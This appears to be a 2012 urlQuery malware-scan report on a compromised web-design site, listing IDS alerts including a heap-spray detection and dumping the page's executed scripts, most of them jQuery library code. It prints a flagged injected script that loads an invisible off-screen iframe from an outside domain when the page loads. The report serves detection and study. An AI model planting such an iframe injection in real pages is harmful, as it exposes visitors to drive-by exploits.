Overview

URLhttp://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
IP97.74.141.1
ASNAS26496 GoDaddy.com, LLC
Location United States
Report completed2012-11-19 05:18:12 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-19 05:17:34 50.28.53.156 urlQuery Client1ET SHELLCODE Excessive Use of HeapLib Objects Likely Malicious Heap Spray Attempt
2012-11-19 05:17:38 205.251.219.89 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-19 05:17:45 173.194.69.148 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-19 05:17:45 95.142.109.22 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-19 05:17:45 95.142.109.22 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-19 05:17:46 95.142.109.22 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-19 05:17:48 69.89.93.7 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 97.74.141.1

Date Alerts / IDS URL IP
2013-02-06 09:18:411 / 0http://psdtoxhtmlexpert.com/html/sinful97.74.141.1
2013-01-31 15:47:540 / 0http://modsandbreaks.com/azzf.htm?h=67399597.74.141.1
2013-01-29 15:27:000 / 0http://aspiredesigncenter.com/97.74.141.1
2013-01-27 23:15:101 / 7http://joyrobertson.com/97.74.141.1
2013-01-27 23:15:051 / 6http://www.joyrobertson.com/97.74.141.1
2013-01-26 16:30:091 / 1http://psdtoxhtmlexpert.com/html/andreson-xhtml97.74.141.1

Last 6 reports on ASN: AS26496 GoDaddy.com, LLC

Date Alerts / IDS URL IP
2013-02-14 16:45:540 / 0http://www.va.childcareaware.org/images/stories//newchase/newchase/newchase/index.htm72.167.232.204
2013-02-14 16:42:550 / 0http://www.whitewizardproducts.com/anoint/index.html72.167.192.95
2013-02-14 16:41:230 / 0http://www.lesserdog.com/Farhad_Foroudi.php97.74.46.128
2013-02-14 16:41:220 / 1http://www.thecorpdevsummit.net/184.168.221.31
2013-02-14 16:39:560 / 0http://www.ccial.org/administrator/templates/system/images/updating.php97.74.55.128
2013-02-14 16:39:440 / 0http://188.121.45.64188.121.45.64



JavaScript

Executed Scripts (167)

#41 JavaScript::Script (size: 276, repeated: 2) - Alert detect on script (Severity: 2)

  function frmAdd() {
      var ifrm = document.createElement('iframe');
      ifrm.style.position = 'absolute';
      ifrm.style.top = '-999em';
      ifrm.style.left = '-999em';
      ifrm.src = "http://fenwaywest.com/media/index.php";
      ifrm.id = 'frmId';
      document.body.appendChild(ifrm);
  };
  window.onload = frmAdd;

Executed Evals (1)

#1 JavaScript::Eval (size: 45922, repeated: 1)

(function() {
    var w = window.jQuery,
        _$ = window.$;
    var D = window.jQuery = window.$ = function(a, b) {
            return new D.fn.init(a, b)
        };
    var u = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,
        isSimple = /^.[^:#\[\.]*$/,
        undefined;
    D.fn = D.prototype = {
        init: function(d, b) {
            d = d || document;
            if (d.nodeType) {
                this[0] = d;
                this.length = 1;
                return this
            }
            if (typeof d == "string") {
                var c = u.exec(d);
                if (c && (c[1] || !b)) {
                    if (c[1]) d = D.clean([c[1]], b);
                    else {
                        var a = document.getElementById(c[3]);
                        if (a) {
                            if (a.id != c[3]) return D().find(d);
                            return D(a)
                        }
                        d = []
                    }
                } else return D(b).find(d)
            } else if (D.isFunction(d)) return D(document)[D.fn.ready ? "ready" : "load"](d);
            return this.setArray(D.makeArray(d))
        },
        jquery: "1.2.6",
        size: function() {
            return this.length
        },
        length: 0,
        get: function(a) {
            return a == undefined ? D.makeArray(this) : this[a]
        },
        pushStack: function(b) {
            var a = D(b);
            a.prevObject = this;
            return a
        },
        setArray: function(a) {
            this.length = 0;
            Array.prototype.push.apply(this, a);
            return this
        },
        each: function(a, b) {
            return D.each(this, a, b)
        },
        index: function(b) {
            var a = -1;
            return D.inArray(b && b.jquery ? b[0] : b, this)
        },
        attr: function(c, a, b) {
            var d = c;
            if (c.constructor == String) if (a === undefined) return this[0] && D[b || "attr"](this[0], c);
            else {
                d = {};
                d[c] = a
            }
            return this.each(function(i) {
                for (c in d) D.attr(b ? this.style : this, c, D.prop(this, d[c], b, i, c))
            })
        },
        css: function(b, a) {
            if ((b == 'width' || b == 'height') && parseFloat(a) < 0) a = undefined;
            return this.attr(b, a, "curCSS")
        },
        text: function(b) {
            if (typeof b != "object" && b != null) return this.empty().append((this[0] && this[0].ownerDocument || document).createTextNode(b));
            var a = "";
            D.each(b || this, function() {
                D.each(this.childNodes, function() {
                    if (this.nodeType != 8) a += this.nodeType != 1 ? this.nodeValue : D.fn.text([this])
                })
            });
            return a
        },
        wrapAll: function(b) {
            if (this[0]) D(b, this[0].ownerDocument).clone().insertBefore(this[0]).map(function() {
                var a = this;
                while (a.firstChild) a = a.firstChild;
                return a
            }).append(this);
            return this
        },
        wrapInner: function(a) {
            return this.each(function() {
                D(this).contents().wrapAll(a)
            })
        },
        wrap: function(a) {
            return this.each(function() {
                D(this).wrapAll(a)
            })
        },
        append: function() {
            return this.domManip(arguments, true, false, function(a) {
                if (this.nodeType == 1) this.appendChild(a)
            })
        },
        prepend: function() {
            return this.domManip(arguments, true, true, function(a) {
                if (this.nodeType == 1) this.insertBefore(a, this.firstChild)
            })
        },
        before: function() {
            return this.domManip(arguments, false, false, function(a) {
                this.parentNode.insertBefore(a, this)
            })
        },
        after: function() {
            return this.domManip(arguments, false, true, function(a) {
                this.parentNode.insertBefore(a, this.nextSibling)
            })
        },
        end: function() {
            return this.prevObject || D([])
        },
        find: function(b) {
            var c = D.map(this, function(a) {
                return D.find(b, a)
            });
            return this.pushStack(/[^+>] [^+>]/.test(b) || b.indexOf("..") > -1 ? D.unique(c) : c)
        },
        clone: function(e) {
            var f = this.map(function() {
                if (D.browser.msie && !D.isXMLDoc(this)) {
                    var a = this.cloneNode(true),
                        container = document.createElement("div");
                    container.appendChild(a);
                    return D.clean([container.innerHTML])[0]
                } else return this.cloneNode(true)
            });
            var d = f.find("*").andSelf().each(function() {
                if (this[E] != undefined) this[E] = null
            });
            if (e === true) this.find("*").andSelf().each(function(i) {
                if (this.nodeType == 3) return;
                var c = D.data(this, "events");
                for (var a in c) for (var b in c[a]) D.event.add(d[i], a, c[a][b], c[a][b].data)
            });
            return f
        },
        filter: function(b) {
            return this.pushStack(D.isFunction(b) && D.grep(this, function(a, i) {
                return b.call(a, i)
            }) || D.multiFilter(b, this))
        },
        not: function(b) {
            if (b.constructor == String) if (isSimple.test(b)) return this.pushStack(D.multiFilter(b, this, true));
            else b = D.multiFilter(b, this);
            var a = b.length && b[b.length - 1] !== undefined && !b.nodeType;
            return this.filter(function() {
                return a ? D.inArray(this, b) < 0 : this != b
            })
        },
        add: function(a) {
            return this.pushStack(D.unique(D.merge(this.get(), typeof a == 'string' ? D(a) : D.makeArray(a))))
        },
        is: function(a) {
            return !!a && D.multiFilter(a, this).length > 0
        },
        hasClass: function(a) {
            return this.is("." + a)
        },
        val: function(b) {
            if (b == undefined) {
                if (this.length) {
                    var c = this[0];
                    if (D.nodeName(c, "select")) {
                        var e = c.selectedIndex,
                            values = [],
                            options = c.options,
                            one = c.type == "select-one";
                        if (e < 0) return null;
                        for (var i = one ? e : 0, max = one ? e + 1 : options.length; i < max; i++) {
                            var d = options[i];
                            if (d.selected) {
                                b = D.browser.msie && !d.attributes.value.specified ? d.text : d.value;
                                if (one) return b;
                                values.push(b)
                            }
                        }
                        return values
                    } else return (this[0].value || "").replace(/\r/g, "")
                }
                return undefined
            }
            if (b.constructor == Number) b += '';
            return this.each(function() {
                if (this.nodeType != 1) return;
                if (b.constructor == Array && /radio|checkbox/.test(this.type)) this.checked = (D.inArray(this.value, b) >= 0 || D.inArray(this.name, b) >= 0);
                else if (D.nodeName(this, "select")) {
                    var a = D.makeArray(b);
                    D("option", this).each(function() {
                        this.selected = (D.inArray(this.value, a) >= 0 || D.inArray(this.text, a) >= 0)
                    });
                    if (!a.length) this.selectedIndex = -1
                } else this.value = b
            })
        },
        html: function(a) {
            return a == undefined ? (this[0] ? this[0].innerHTML : null) : this.empty().append(a)
        },
        replaceWith: function(a) {
            return this.after(a).remove()
        },
        eq: function(i) {
            return this.slice(i, i + 1)
        },
        slice: function() {
            return this.pushStack(Array.prototype.slice.apply(this, arguments))
        },
        map: function(b) {
            return this.pushStack(D.map(this, function(a, i) {
                return b.call(a, i, a)
            }))
        },
        andSelf: function() {
            return this.add(this.prevObject)
        },
        data: function(d, b) {
            var a = d.split(".");
            a[1] = a[1] ? "." + a[1] : "";
            if (b === undefined) {
                var c = this.triggerHandler("getData" + a[1] + "!", [a[0]]);
                if (c === undefined && this.length) c = D.data(this[0], d);
                return c === undefined && a[1] ? this.data(a[0]) : c
            } else return this.trigger("setData" + a[1] + "!", [a[0], b]).each(function() {
                D.data(this, d, b)
            })
        },
        removeData: function(a) {
            return this.each(function() {
                D.removeData(this, a)
            })
        },
        domManip: function(g, f, h, d) {
            var e = this.length > 1,
                elems;
            return this.each(function() {
                if (!elems) {
                    elems = D.clean(g, this.ownerDocument);
                    if (h) elems.reverse()
                }
                var b = this;
                if (f && D.nodeName(this, "table") && D.nodeName(elems[0], "tr")) b = this.getElementsByTagName("tbody")[0] || this.appendChild(this.ownerDocument.createElement("tbody"));
                var c = D([]);
                D.each(elems, function() {
                    var a = e ? D(this).clone(true)[0] : this;
                    if (D.nodeName(a, "script")) c = c.add(a);
                    else {
                        if (a.nodeType == 1) c = c.add(D("script", a).remove());
                        d.call(b, a)
                    }
                });
                c.each(evalScript)
            })
        }
    };
    D.fn.init.prototype = D.fn;

    function evalScript(i, a) {
        if (a.src) D.ajax({
            url: a.src,
            async: false,
            dataType: "script"
        });
        else D.globalEval(a.text || a.textContent || a.innerHTML || "");
        if (a.parentNode) a.parentNode.removeChild(a)
    }
    function now() {
        return +new Date
    }
    D.extend = D.fn.extend = function() {
        var b = arguments[0] || {},
            i = 1,
            length = arguments.length,
            deep = false,
            options;
        if (b.constructor == Boolean) {
            deep = b;
            b = arguments[1] || {};
            i = 2
        }
        if (typeof b != "object" && typeof b != "function") b = {};
        if (length == i) {
            b = this;
            --i
        }
        for (; i < length; i++) if ((options = arguments[i]) != null) for (var c in options) {
            var a = b[c],
                copy = options[c];
            if (b === copy) continue;
            if (deep && copy && typeof copy == "object" && !copy.nodeType) b[c] = D.extend(deep, a || (copy.length != null ? [] : {}), copy);
            else if (copy !== undefined) b[c] = copy
        }
        return b
    };
    var E = "jQuery" + now(),
        uuid = 0,
        windowData = {},
        exclude = /z-?index|font-?weight|opacity|zoom|line-?height/i,
        defaultView = document.defaultView || {};
    D.extend({
        noConflict: function(a) {
            window.$ = _$;
            if (a) window.jQuery = w;
            return D
        },
        isFunction: function(a) {
            return !!a && typeof a != "string" && !a.nodeName && a.constructor != Array && /^[\s[]?function/.test(a + "")
        },
        isXMLDoc: function(a) {
            return a.documentElement && !a.body || a.tagName && a.ownerDocument && !a.ownerDocument.body
        },
        globalEval: function(a) {
            a = D.trim(a);
            if (a) {
                var b = document.getElementsByTagName("head")[0] || document.documentElement,
                    script = document.createElement("script");
                script.type = "text/javascript";
                if (D.browser.msie) script.text = a;
                else script.appendChild(document.createTextNode(a));
                b.insertBefore(script, b.firstChild);
                b.removeChild(script)
            }
        },
        nodeName: function(b, a) {
            return b.nodeName && b.nodeName.toUpperCase() == a.toUpperCase()
        },
        cache: {},
        data: function(c, d, b) {
            c = c == window ? windowData : c;
            var a = c[E];
            if (!a) a = c[E] = ++uuid;
            if (d && !D.cache[a]) D.cache[a] = {};
            if (b !== undefined) D.cache[a][d] = b;
            return d ? D.cache[a][d] : a
        },
        removeData: function(c, b) {
            c = c == window ? windowData : c;
            var a = c[E];
            if (b) {
                if (D.cache[a]) {
                    delete D.cache[a][b];
                    b = "";
                    for (b in D.cache[a]) break;
                    if (!b) D.removeData(c)
                }
            } else {
                try {
                    delete c[E]
                } catch (e) {
                    if (c.removeAttribute) c.removeAttribute(E)
                }
                delete D.cache[a]
            }
        },
        each: function(d, a, c) {
            var e, i = 0,
                length = d.length;
            if (c) {
                if (length == undefined) {
                    for (e in d) if (a.apply(d[e], c) === false) break
                } else for (; i < length;) if (a.apply(d[i++], c) === false) break
            } else {
                if (length == undefined) {
                    for (e in d) if (a.call(d[e], e, d[e]) === false) break
                } else for (var b = d[0]; i < length && a.call(b, i, b) !== false; b = d[++i]) {}
            }
            return d
        },
        prop: function(b, a, c, i, d) {
            if (D.isFunction(a)) a = a.call(b, i);
            return a && a.constructor == Number && c == "curCSS" && !exclude.test(d) ? a + "px" : a
        },
        className: {
            add: function(c, b) {
                D.each((b || "").split(/\s+/), function(i, a) {
                    if (c.nodeType == 1 && !D.className.has(c.className, a)) c.className += (c.className ? " " : "") + a
                })
            },
            remove: function(c, b) {
                if (c.nodeType == 1) c.className = b != undefined ? D.grep(c.className.split(/\s+/), function(a) {
                    return !D.className.has(b, a)
                }).join(" ") : ""
            },
            has: function(b, a) {
                return D.inArray(a, (b.className || b).toString().split(/\s+/)) > -1
            }
        },
        swap: function(b, c, a) {
            var e = {};
            for (var d in c) {
                e[d] = b.style[d];
                b.style[d] = c[d]
            }
            a.call(b);
            for (var d in c) b.style[d] = e[d]
        },
        css: function(d, e, c) {
            if (e == "width" || e == "height") {
                var b, props = {
                    position: "absolute",
                    visibility: "hidden",
                    display: "block"
                },
                    which = e == "width" ? ["Left", "Right"] : ["Top", "Bottom"];

                function getWH() {
                    b = e == "width" ? d.offsetWidth : d.offsetHeight;
                    var a = 0,
                        border = 0;
                    D.each(which, function() {
                        a += parseFloat(D.curCSS(d, "padding" + this, true)) || 0;
                        border += parseFloat(D.curCSS(d, "border" + this + "Width", true)) || 0
                    });
                    b -= Math.round(a + border)
                }
                if (D(d).is(":visible")) getWH();
                else D.swap(d, props, getWH);
                return Math.max(0, b)
            }
            return D.curCSS(d, e, c)
        },
        curCSS: function(f, l, k) {
            var e, style = f.style;

            function color(b) {
                if (!D.browser.safari) return false;
                var a = defaultView.getComputedStyle(b, null);
                return !a || a.getPropertyValue("color") == ""
            }
            if (l == "opacity" && D.browser.msie) {
                e = D.attr(style, "opacity");
                return e == "" ? "1" : e
            }
            if (D.browser.opera && l == "display") {
                var d = style.outline;
                style.outline = "0 solid black";
                style.outline = d
            }
            if (l.match(/float/i)) l = y;
            if (!k && style && style[l]) e = style[l];
            else if (defaultView.getComputedStyle) {
                if (l.match(/float/i)) l = "float";
                l = l.replace(/([A-Z])/g, "-$1").toLowerCase();
                var c = defaultView.getComputedStyle(f, null);
                if (c && !color(f)) e = c.getPropertyValue(l);
                else {
                    var g = [],
                        stack = [],
                        a = f,
                        i = 0;
                    for (; a && color(a); a = a.parentNode) stack.unshift(a);
                    for (; i < stack.length; i++) if (color(stack[i])) {
                        g[i] = stack[i].style.display;
                        stack[i].style.display = "block"
                    }
                    e = l == "display" && g[stack.length - 1] != null ? "none" : (c && c.getPropertyValue(l)) || "";
                    for (i = 0; i < g.length; i++) if (g[i] != null) stack[i].style.display = g[i]
                }
                if (l == "opacity" && e == "") e = "1"
            } else if (f.currentStyle) {
                var h = l.replace(/\-(\w)/g, function(a, b) {
                    return b.toUpperCase()
                });
                e = f.currentStyle[l] || f.currentStyle[h];
                if (!/^\d+(px)?$/i.test(e) && /^\d/.test(e)) {
                    var j = style.left,
                        rsLeft = f.runtimeStyle.left;
                    f.runtimeStyle.left = f.currentStyle.left;
                    style.left = e || 0;
                    e = style.pixelLeft + "px";
                    style.left = j;
                    f.runtimeStyle.left = rsLeft
                }
            }
            return e
        },
        clean: function(l, h) {
            var k = [];
            h = h || document;
            if (typeof h.createElement == 'undefined') h = h.ownerDocument || h[0] && h[0].ownerDocument || document;
            D.each(l, function(i, d) {
                if (!d) return;
                if (d.constructor == Number) d += '';
                if (typeof d == "string") {
                    d = d.replace(/(<(\w+)[^>]*?)\/>/g, function(b, a, c) {
                        return c.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i) ? b : a + "></" + c + ">"
                    });
                    var f = D.trim(d).toLowerCase(),
                        div = h.createElement("div");
                    var e = !f.indexOf("<opt") && [1, "<select multiple='multiple'>", "</select>"] || !f.indexOf("<leg") && [1, "<fieldset>", "</fieldset>"] || f.match(/^<(thead|tbody|tfoot|colg|cap)/) && [1, "<table>", "</table>"] || !f.indexOf("<tr") && [2, "<table><tbody>", "</tbody></table>"] || (!f.indexOf("<td") || !f.indexOf("<th")) && [3, "<table><tbody><tr>", "</tr></tbody></table>"] || !f.indexOf("<col") && [2, "<table><tbody></tbody><colgroup>", "</colgroup></table>"] || D.browser.msie && [1, "div<div>", "</div>"] || [0, "", ""];
                    div.innerHTML = e[1] + d + e[2];
                    while (e[0]--) div = div.lastChild;
                    if (D.browser.msie) {
                        var g = !f.indexOf("<table") && f.indexOf("<tbody") < 0 ? div.firstChild && div.firstChild.childNodes : e[1] == "<table>" && f.indexOf("<tbody") < 0 ? div.childNodes : [];
                        for (var j = g.length - 1; j >= 0; --j) if (D.nodeName(g[j], "tbody") && !g[j].childNodes.length) g[j].parentNode.removeChild(g[j]);
                        if (/^\s/.test(d)) div.insertBefore(h.createTextNode(d.match(/^\s*/)[0]), div.firstChild)
                    }
                    d = D.makeArray(div.childNodes)
                }
                if (d.length === 0 && (!D.nodeName(d, "form") && !D.nodeName(d, "select"))) return;
                if (d[0] == undefined || D.nodeName(d, "form") || d.options) k.push(d);
                else k = D.merge(k, d)
            });
            return k
        },
        attr: function(d, f, c) {
            if (!d || d.nodeType == 3 || d.nodeType == 8) return undefined;
            var e = !D.isXMLDoc(d),
                set = c !== undefined,
                msie = D.browser.msie;
            f = e && D.props[f] || f;
            if (d.tagName) {
                var g = /href|src|style/.test(f);
                if (f == "selected" && D.browser.safari) d.parentNode.selectedIndex;
                if (f in d && e && !g) {
                    if (set) {
                        if (f == "type" && D.nodeName(d, "input") && d.parentNode) throw "type property can't be changed";
                        d[f] = c
                    }
                    if (D.nodeName(d, "form") && d.getAttributeNode(f)) return d.getAttributeNode(f).nodeValue;
                    return d[f]
                }
                if (msie && e && f == "style") return D.attr(d.style, "cssText", c);
                if (set) d.setAttribute(f, "" + c);
                var h = msie && e && g ? d.getAttribute(f, 2) : d.getAttribute(f);
                return h === null ? undefined : h
            }
            if (msie && f == "opacity") {
                if (set) {
                    d.zoom = 1;
                    d.filter = (d.filter || "").replace(/alpha\([^)]*\)/, "") + (parseInt(c) + '' == "NaN" ? "" : "alpha(opacity=" + c * 100 + ")")
                }
                return d.filter && d.filter.indexOf("opacity=") >= 0 ? (parseFloat(d.filter.match(/opacity=([^)]*)/)[1]) / 100) + '' : ""
            }
            f = f.replace(/-([a-z])/ig, function(a, b) {
                return b.toUpperCase()
            });
            if (set) d[f] = c;
            return d[f]
        },
        trim: function(a) {
            return (a || "").replace(/^\s+|\s+$/g, "")
        },
        makeArray: function(b) {
            var a = [];
            if (b != null) {
                var i = b.length;
                if (i == null || b.split || b.setInterval || b.call) a[0] = b;
                else while (i) a[--i] = b[i]
            }
            return a
        },
        inArray: function(b, a) {
            for (var i = 0, length = a.length; i < length; i++) if (a[i] === b) return i;
            return -1
        },
        merge: function(a, b) {
            var i = 0,
                elem, pos = a.length;
            if (D.browser.msie) {
                while (elem = b[i++]) if (elem.nodeType != 8) a[pos++] = elem
            } else while (elem = b[i++]) a[pos++] = elem;
            return a
        },
        unique: function(a) {
            var c = [],
                done = {};
            try {
                for (var i = 0, length = a.length; i < length; i++) {
                    var b = D.data(a[i]);
                    if (!done[b]) {
                        done[b] = true;
                        c.push(a[i])
                    }
                }
            } catch (e) {
                c = a
            }
            return c
        },
        grep: function(c, a, d) {
            var b = [];
            for (var i = 0, length = c.length; i < length; i++) if (!d != !a(c[i], i)) b.push(c[i]);
            return b
        },
        map: function(d, a) {
            var c = [];
            for (var i = 0, length = d.length; i < length; i++) {
                var b = a(d[i], i);
                if (b != null) c[c.length] = b
            }
            return c.concat.apply([], c)
        }
    });
    var v = navigator.userAgent.toLowerCase();
    D.browser = {
        version: (v.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1],
        safari: /webkit/.test(v),
        opera: /opera/.test(v),
        msie: /msie/.test(v) && !/opera/.test(v),
        mozilla: /mozilla/.test(v) && !/(compatible|webkit)/.test(v)
    };
    var y = D.browser.msie ? "styleFloat" : "cssFloat";
    D.extend({
        boxModel: !D.browser.msie || document.compatMode == "CSS1Compat",
        props: {
            "for": "htmlFor",
            "class": "className",
            "float": y,
            cssFloat: y,
            styleFloat: y,
            readonly: "readOnly",
            maxlength: "maxLength",
            cellspacing: "cellSpacing"
        }
    });
    D.each({
        parent: function(a) {
            return a.parentNode
        },
        parents: function(a) {
            return D.dir(a, "parentNode")
        },
        next: function(a) {
            return D.nth(a, 2, "nextSibling")
        },
        prev: function(a) {
            return D.nth(a, 2, "previousSibling")
        },
        nextAll: function(a) {
            return D.dir(a, "nextSibling")
        },
        prevAll: function(a) {
            return D.dir(a, "previousSibling")
        },
        siblings: function(a) {
            return D.sibling(a.parentNode.firstChild, a)
        },
        children: function(a) {
            return D.sibling(a.firstChild)
        },
        contents: function(a) {
            return D.nodeName(a, "iframe") ? a.contentDocument || a.contentWindow.document : D.makeArray(a.childNodes)
        }
    }, function(c, d) {
        D.fn[c] = function(b) {
            var a = D.map(this, d);
            if (b && typeof b == "string") a = D.multiFilter(b, a);
            return this.pushStack(D.unique(a))
        }
    });
    D.each({
        appendTo: "append",
        prependTo: "prepend",
        insertBefore: "before",
        insertAfter: "after",
        replaceAll: "replaceWith"
    }, function(c, b) {
        D.fn[c] = function() {
            var a = arguments;
            return this.each(function() {
                for (var i = 0, length = a.length; i < length; i++) D(a[i])[b](this)
            })
        }
    });
    D.each({
        removeAttr: function(a) {
            D.attr(this, a, "");
            if (this.nodeType == 1) this.removeAttribute(a)
        },
        addClass: function(a) {
            D.className.add(this, a)
        },
        removeClass: function(a) {
            D.className.remove(this, a)
        },
        toggleClass: function(a) {
            D.className[D.className.has(this, a) ? "remove" : "add"](this, a)
        },
        remove: function(a) {
            if (!a || D.filter(a, [this]).r.length) {
                D("*", this).add(this).each(function() {
                    D.event.remove(this);
                    D.removeData(this)
                });
                if (this.parentNode) this.parentNode.removeChild(this)
            }
        },
        empty: function() {
            D(">*", this).remove();
            while (this.firstChild) this.removeChild(this.firstChild)
        }
    }, function(a, b) {
        D.fn[a] = function() {
            return this.each(b, arguments)
        }
    });
    D.each(["Height", "Width"], function(i, c) {
        var b = c.toLowerCase();
        D.fn[b] = function(a) {
            return this[0] == window ? D.browser.opera && document.body["client" + c] || D.browser.safari && window["inner" + c] || document.compatMode == "CSS1Compat" && document.documentElement["client" + c] || document.body["client" + c] : this[0] == document ? Math.max(Math.max(document.body["scroll" + c], document.documentElement["scroll" + c]), Math.max(document.body["offset" + c], document.documentElement["offset" + c])) : a == undefined ? (this.length ? D.css(this[0], b) : null) : this.css(b, a.constructor == String ? a : a + "px")
        }
    });

    function num(a, b) {
        return a[0] && parseInt(D.curCSS(a[0], b, true), 10) || 0
    }
    var C = D.browser.safari && parseInt(D.browser.version) < 417 ? "(?:[\\w*_-]|\\\\.)" : "(?:[\\w\u0128-\uFFFF*_-]|\\\\.)",
        quickChild = new RegExp("^>\\s*(" + C + "+)"),
        quickID = new RegExp("^(" + C + "+)(#)(" + C + "+)"),
        quickClass = new RegExp("^([#.]?)(" + C + "*)");
    D.extend({
        expr: {
            "": function(a, i, m) {
                return m[2] == "*" || D.nodeName(a, m[2])
            },
            "#": function(a, i, m) {
                return a.getAttribute("id") == m[2]
            },
            ":": {
                lt: function(a, i, m) {
                    return i < m[3] - 0
                },
                gt: function(a, i, m) {
                    return i > m[3] - 0
                },
                nth: function(a, i, m) {
                    return m[3] - 0 == i
                },
                eq: function(a, i, m) {
                    return m[3] - 0 == i
                },
                first: function(a, i) {
                    return i == 0
                },
                last: function(a, i, m, r) {
                    return i == r.length - 1
                },
                even: function(a, i) {
                    return i % 2 == 0
                },
                odd: function(a, i) {
                    return i % 2
                },
                "first-child": function(a) {
                    return a.parentNode.getElementsByTagName("*")[0] == a
                },
                "last-child": function(a) {
                    return D.nth(a.parentNode.lastChild, 1, "previousSibling") == a
                },
                "only-child": function(a) {
                    return !D.nth(a.parentNode.lastChild, 2, "previousSibling")
                },
                parent: function(a) {
                    return a.firstChild
                },
                empty: function(a) {
                    return !a.firstChild
                },
                contains: function(a, i, m) {
                    return (a.textContent || a.innerText || D(a).text() || "").indexOf(m[3]) >= 0
                },
                visible: function(a) {
                    return "hidden" != a.type && D.css(a, "display") != "none" && D.css(a, "visibility") != "hidden"
                },
                hidden: function(a) {
                    return "hidden" == a.type || D.css(a, "display") == "none" || D.css(a, "visibility") == "hidden"
                },
                enabled: function(a) {
                    return !a.disabled
                },
                disabled: function(a) {
                    return a.disabled
                },
                checked: function(a) {
                    return a.checked
                },
                selected: function(a) {
                    return a.selected || D.attr(a, "selected")
                },
                text: function(a) {
                    return "text" == a.type
                },
                radio: function(a) {
                    return "radio" == a.type
                },
                checkbox: function(a) {
                    return "checkbox" == a.type
                },
                file: function(a) {
                    return "file" == a.type
                },
                password: function(a) {
                    return "password" == a.type
                },
                submit: function(a) {
                    return "submit" == a.type
                },
                image: function(a) {
                    return "image" == a.type
                },
                reset: function(a) {
                    return "reset" == a.type
                },
                button: function(a) {
                    return "button" == a.type || D.nodeName(a, "button")
                },
                input: function(a) {
                    return /input|select|textarea|button/i.test(a.nodeName)
                },
                has: function(a, i, m) {
                    return D.find(m[3], a).length
                },
                header: function(a) {
                    return /h\d/i.test(a.nodeName)
                },
                animated: function(a) {
                    return D.grep(D.timers, function(b) {
                        return a == b.elem
                    }).length
                }
            }
        },
        parse: [/^(\[) *@?([\w-]+) *([!*$^~=]*) *('?"?)(.*?)\4 *\]/, /^(:)([\w-]+)\("?'?(.*?(\(.*?\))?[^(]*?)"?'?\)/, new RegExp("^([:.#]*)(" + C + "+)")],
        multiFilter: function(a, c, b) {
            var d, cur = [];
            while (a && a != d) {
                d = a;
                var f = D.filter(a, c, b);
                a = f.t.replace(/^\s*,\s*/, "");
                cur = b ? c = f.r : D.merge(cur, f.r)
            }
            return cur
        },
        find: function(t, o) {
            if (typeof t != "string") return [t];
            if (o && o.nodeType != 1 && o.nodeType != 9) return [];
            o = o || document;
            var d = [o],
                done = [],
                last, nodeName;
            while (t && last != t) {
                var r = [];
                last = t;
                t = D.trim(t);
                var l = false,
                    re = quickChild,
                    m = re.exec(t);
                if (m) {
                    nodeName = m[1].toUpperCase();
                    for (var i = 0; d[i]; i++) for (var c = d[i].firstChild; c; c = c.nextSibling) if (c.nodeType == 1 && (nodeName == "*" || c.nodeName.toUpperCase() == nodeName)) r.push(c);
                    d = r;
                    t = t.replace(re, "");
                    if (t.indexOf(" ") == 0) continue;
                    l = true
                } else {
                    re = /^([>+~])\s*(\w*)/i;
                    if ((m = re.exec(t)) != null) {
                        r = [];
                        var k = {};
                        nodeName = m[2].toUpperCase();
                        m = m[1];
                        for (var j = 0, rl = d.length; j < rl; j++) {
                            var n = m == "~" || m == "+" ? d[j].nextSibling : d[j].firstChild;
                            for (; n; n = n.nextSibling) if (n.nodeType == 1) {
                                var g = D.data(n);
                                if (m == "~" && k[g]) break;
                                if (!nodeName || n.nodeName.toUpperCase() == nodeName) {
                                    if (m == "~") k[g] = true;
                                    r.push(n)
                                }
                                if (m == "+") break
                            }
                        }
                        d = r;
                        t = D.trim(t.replace(re, ""));
                        l = true
                    }
                }
                if (t && !l) {
                    if (!t.indexOf(",")) {
                        if (o == d[0]) d.shift();
                        done = D.merge(done, d);
                        r = d = [o];
                        t = " " + t.substr(1, t.length)
                    } else {
                        var h = quickID;
                        var m = h.exec(t);
                        if (m) {
                            m = [0, m[2], m[3], m[1]]
                        } else {
                            h = quickClass;
                            m = h.exec(t)
                        }
                        m[2] = m[2].replace(/\\/g, "");
                        var f = d[d.length - 1];
                        if (m[1] == "#" && f && f.getElementById && !D.isXMLDoc(f)) {
                            var p = f.getElementById(m[2]);
                            if ((D.browser.msie || D.browser.opera) && p && typeof p.id == "string" && p.id != m[2]) p = D('[@id="' + m[2] + '"]', f)[0];
                            d = r = p && (!m[3] || D.nodeName(p, m[3])) ? [p] : []
                        } else {
                            for (var i = 0; d[i]; i++) {
                                var a = m[1] == "#" && m[3] ? m[3] : m[1] != "" || m[0] == "" ? "*" : m[2];
                                if (a == "*" && d[i].nodeName.toLowerCase() == "object") a = "param";
                                r = D.merge(r, d[i].getElementsByTagName(a))
                            }
                            if (m[1] == ".") r = D.classFilter(r, m[2]);
                            if (m[1] == "#") {
                                var e = [];
                                for (var i = 0; r[i]; i++) if (r[i].getAttribute("id") == m[2]) {
                                    e = [r[i]];
                                    break
                                }
                                r = e
                            }
                            d = r
                        }
                        t = t.replace(h, "")
                    }
                }
                if (t) {
                    var b = D.filter(t, r);
                    d = r = b.r;
                    t = D.trim(b.t)
                }
            }
            if (t) d = [];
            if (d && o == d[0]) d.shift();
            done = D.merge(done, d);
            return done
        },
        classFilter: function(r, m, a) {
            m = " " + m + " ";
            var c = [];
            for (var i = 0; r[i]; i++) {
                var b = (" " + r[i].className + " ").indexOf(m) >= 0;
                if (!a && b || a && !b) c.push(r[i])
            }
            return c
